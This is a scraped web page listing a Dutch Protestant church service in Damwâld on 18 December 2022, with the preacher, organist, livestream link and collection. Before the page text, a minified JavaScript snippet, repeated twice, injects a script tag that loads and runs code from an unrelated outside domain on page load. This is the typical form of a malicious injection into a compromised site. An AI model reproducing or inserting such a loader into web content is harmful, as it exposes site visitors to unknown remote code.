;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 december 2022 9:30 uur - PKN Damwâld
zondag 18 december 2022
09:30 uur
Vierde Advent

Kerkdienst zondag 18 december 2022 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Foeke Wiegersma
Mededeling:Vierde Advent
LivestreamDienst terugkijken
Bekijk op Youtube
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Uitganscollecte: Collecte kerk in actie 2022 Werelddiaconaat